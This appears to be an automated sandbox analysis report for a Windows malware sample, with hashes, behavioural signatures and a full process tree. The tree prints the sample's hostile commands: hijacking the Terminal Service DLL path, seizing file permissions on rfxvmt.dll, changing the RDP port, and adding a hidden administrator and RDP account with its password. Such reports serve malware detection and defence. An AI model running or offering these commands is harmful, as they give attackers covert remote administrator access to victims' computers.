Analysis
-
max time kernel
180s -
max time network
183s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
03-07-2022 09:50
Static task
static1
Behavioral task
behavioral1
Sample
3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe
Resource
win10v2004-20220414-en
General
-
Target
3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe
-
Size
3.0MB
-
MD5
df759879f60a7276ff8911c366cbb8a5
-
SHA1
26fa79f21bc021128e91e5142f6a17c07e750251
-
SHA256
3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6
-
SHA512
57c5780ba66d73f15f13a227dd012fef2b1c921d6d79e2bf8a14a0b0b9581a4854c82434be779f4d9fee32729d80b0a75f1907b5e08cf11c6499b7040b8387db
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
pid Process 2532 icacls.exe 3796 icacls.exe 4232 icacls.exe 608 takeown.exe 932 icacls.exe 2592 icacls.exe 1464 icacls.exe 4916 icacls.exe -
Sets DLL path for service in the registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "c:\\program files\\windows mail\\appcache.xml" reg.exe -
resource yara_rule behavioral2/files/0x000600000000072d-165.dat upx behavioral2/files/0x0004000000000731-166.dat upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation 3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe -
Loads dropped DLL 7 IoCs
pid Process 2200 3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe 2200 3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe 2200 3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe 2200 3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe 2200 3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe 1312 Process not Found 1312 Process not Found -
Modifies file permissions 1 TTPs 8 IoCs
pid Process 3796 icacls.exe 4232 icacls.exe 608 takeown.exe 932 icacls.exe 2592 icacls.exe 1464 icacls.exe 4916 icacls.exe 2532 icacls.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\windows mail\appcache.xml powershell.exe File created C:\Program Files\windows mail\default_list.xml powershell.exe File created C:\Program Files\windows mail\cleanuptask.cfg powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 1 IoCs
pid Process 1568 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe 3560 powershell.exe -
Suspicious behavior: LoadsDriver 4 IoCs
pid Process 664 Process not Found 664 Process not Found 664 Process not Found 664 Process not Found -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3560 powershell.exe Token: SeRestorePrivilege 2592 icacls.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2200 wrote to memory of 4704 2200 3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe 82 PID 2200 wrote to memory of 4704 2200 3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe 82 PID 4704 wrote to memory of 3560 4704 cmd.exe 84 PID 4704 wrote to memory of 3560 4704 cmd.exe 84 PID 3560 wrote to memory of 608 3560 powershell.exe 85 PID 3560 wrote to memory of 608 3560 powershell.exe 85 PID 3560 wrote to memory of 932 3560 powershell.exe 86 PID 3560 wrote to memory of 932 3560 powershell.exe 86 PID 3560 wrote to memory of 2592 3560 powershell.exe 87 PID 3560 wrote to memory of 2592 3560 powershell.exe 87 PID 3560 wrote to memory of 1464 3560 powershell.exe 88 PID 3560 wrote to memory of 1464 3560 powershell.exe 88 PID 3560 wrote to memory of 4916 3560 powershell.exe 89 PID 3560 wrote to memory of 4916 3560 powershell.exe 89 PID 3560 wrote to memory of 2532 3560 powershell.exe 90 PID 3560 wrote to memory of 2532 3560 powershell.exe 90 PID 3560 wrote to memory of 3796 3560 powershell.exe 91 PID 3560 wrote to memory of 3796 3560 powershell.exe 91 PID 3560 wrote to memory of 4232 3560 powershell.exe 92 PID 3560 wrote to memory of 4232 3560 powershell.exe 92 PID 3560 wrote to memory of 3228 3560 powershell.exe 93 PID 3560 wrote to memory of 3228 3560 powershell.exe 93 PID 3560 wrote to memory of 1568 3560 powershell.exe 94 PID 3560 wrote to memory of 1568 3560 powershell.exe 94 PID 3560 wrote to memory of 220 3560 powershell.exe 95 PID 3560 wrote to memory of 220 3560 powershell.exe 95 PID 3560 wrote to memory of 3600 3560 powershell.exe 98 PID 3560 wrote to memory of 3600 3560 powershell.exe 98 PID 3600 wrote to memory of 3864 3600 net.exe 99 PID 3600 wrote to memory of 3864 3600 net.exe 99 PID 3560 wrote to memory of 3324 3560 powershell.exe 104 PID 3560 wrote to memory of 3324 3560 powershell.exe 104 PID 3324 wrote to memory of 3352 3324 cmd.exe 105 PID 3324 wrote to memory of 3352 3324 cmd.exe 105 PID 3352 wrote to memory of 2396 3352 cmd.exe 106 PID 3352 wrote to memory of 2396 3352 cmd.exe 106 PID 2396 wrote to memory of 740 2396 net.exe 107 PID 2396 wrote to memory of 740 2396 net.exe 107 PID 3560 wrote to memory of 1608 3560 powershell.exe 108 PID 3560 wrote to memory of 1608 3560 powershell.exe 108 PID 1608 wrote to memory of 2620 1608 cmd.exe 109 PID 1608 wrote to memory of 2620 1608 cmd.exe 109 PID 2620 wrote to memory of 876 2620 cmd.exe 110 PID 2620 wrote to memory of 876 2620 cmd.exe 110 PID 876 wrote to memory of 1456 876 net.exe 111 PID 876 wrote to memory of 1456 876 net.exe 111 PID 5016 wrote to memory of 4304 5016 cmd.exe 115 PID 5016 wrote to memory of 4304 5016 cmd.exe 115 PID 4304 wrote to memory of 3320 4304 net.exe 116 PID 4304 wrote to memory of 3320 4304 net.exe 116 PID 5060 wrote to memory of 4132 5060 cmd.exe 119 PID 5060 wrote to memory of 4132 5060 cmd.exe 119 PID 4132 wrote to memory of 4272 4132 net.exe 120 PID 4132 wrote to memory of 4272 4132 net.exe 120 PID 3560 wrote to memory of 4708 3560 powershell.exe 121 PID 3560 wrote to memory of 4708 3560 powershell.exe 121 PID 3560 wrote to memory of 1068 3560 powershell.exe 122 PID 3560 wrote to memory of 1068 3560 powershell.exe 122 PID 2376 wrote to memory of 4852 2376 cmd.exe 125 PID 2376 wrote to memory of 4852 2376 cmd.exe 125 PID 4852 wrote to memory of 3732 4852 net.exe 126 PID 4852 wrote to memory of 3732 4852 net.exe 126 PID 3624 wrote to memory of 440 3624 cmd.exe 129 PID 3624 wrote to memory of 440 3624 cmd.exe 129
Processes
-
C:\Users\Admin\AppData\Local\Temp\3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe"C:\Users\Admin\AppData\Local\Temp\3bba5666ae0c50aacc8472c5bece1a0082e255128303b2274d6d6ca8e48154a6.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2200 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\premiumextraXEUKJDDYYG.ps12⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\premiumextraXEUKJDDYYG.ps13⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:608
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:932
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1464
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4916
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2532
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3796
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4232
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f4⤵PID:3228
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d "c:\program files\windows mail\appcache.xml" /f4⤵
- Sets DLL path for service in the registry
- Modifies registry key
PID:1568
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f4⤵PID:220
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵PID:3864
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd/c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Windows\system32\cmd.execmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
PID:3352 -
C:\Windows\system32\net.exenet start rdpdr6⤵
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr7⤵PID:740
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd/c net start TermService4⤵
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Windows\system32\cmd.execmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\system32\net.exenet start TermService6⤵
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService7⤵PID:1456
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f4⤵PID:4708
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f4⤵PID:1068
-
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 0000999999 /del1⤵
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\system32\net.exenet.exe user wgautilacc 0000999999 /del2⤵
- Suspicious use of WriteProcessMemory
PID:4304 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 0000999999 /del3⤵PID:3320
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 2JrQWSks /add1⤵
- Suspicious use of WriteProcessMemory
PID:5060 -
C:\Windows\system32\net.exenet.exe user wgautilacc 2JrQWSks /add2⤵
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 2JrQWSks /add3⤵PID:4272
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:3732
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" TWJYXOUL$ /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:3624 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" TWJYXOUL$ /ADD2⤵PID:440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" TWJYXOUL$ /ADD3⤵PID:3548
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵PID:2976
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵PID:4296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:4932
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc 2JrQWSks1⤵PID:1864
-
C:\Windows\system32\net.exenet.exe user wgautilacc 2JrQWSks2⤵PID:4592
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 2JrQWSks3⤵PID:3120
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD59b7e262bc9d18042b92b9d9f9bd6e0e3
SHA1eba7927cf0187593c2e8d8e809cd8ebb9615512e
SHA2568b64700ce643f806f57ca6d272007868ae75642bcafb87964e8e553d97334b3d
SHA5123f1cf017326e05b3ccbeb301d02a2273a4800d618c9d7729830eeaf17afc067c1f20d0298830efdb46c8459f448e26da6567441d4e41917c1990837361c5028c
-
Filesize
789KB
MD5939af66cd1befa90bbb1fa1e6d5e2ed6
SHA165f462ed99b4b54fc959f0a0bfd6d871e544cb44
SHA2569ad96e4c82b148b927f959722680fbe02d6ec6f37dc80160b8b6066afebe3d4c
SHA512de52e5574d43aed03a3adcd73ffeba936fe84c506190c16ed925ee51122e107b0a9077f7664c5ec6370b4bfe8989943d4d57a6b3e827aab74b014c079a723aa2
-
Filesize
112KB
MD51fad9bbbd35b9d3387ffe3334dedb29f
SHA15a23745103c53d0687ea029f78b87188be0984a5
SHA2568981e715b26d56fe291878f9b2b23a8e27160ab66cfd374377fb72302aa3f61e
SHA512b32aa61b3e21ba7d64b1efc84e4f487a48c367e17a1c788d287be92569f7e1dbf6c81427a2190fb71f90d683a9bd7929a46ab20347778611805eaf2a45c7f50c
-
Filesize
102B
MD55c2db4d82f47ade611b7f4b738d8c0e3
SHA1a84f233c16beb5579c4e33bb6e14f34ee5ac8227
SHA2565a841e119a66efae3c7b034a32d0f9832673db1ebd2768d828440fd167352dfb
SHA51221250b8d1fd16dd52b35dc17a42edc2ca6a0fcf7146dbbdde49b26407cfd51a27f78919374c748744deac24414f7d3113803a25990a157bd1c76177489e89949
-
Filesize
11KB
MD5fbe295e5a1acfbd0a6271898f885fe6a
SHA1d6d205922e61635472efb13c2bb92c9ac6cb96da
SHA256a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1
SHA5122cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
22KB
MD55afd4a9b7e69e7c6e312b2ce4040394a
SHA1fbd07adb3f02f866dc3a327a86b0f319d4a94502
SHA256053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae
SHA512f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511
-
Filesize
3.5MB
MD5b012a0a6c20d3dd529f4cd437a3be021
SHA1771ac8896af151a287e20abd721c601f2843a6e8
SHA256cf2e059f248615933a78e988321e5cc6ca55463e62e7cbc96fb02bf935d0659a
SHA5122d414d89ba01914ad16e9b92fd8ae4e9d637d21d984dba20381015dbc34780842b3cd0146f5938d6cb7c5fb8dca1729a4f84beb6598b28fec71fdaa2ccbf6cc5
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7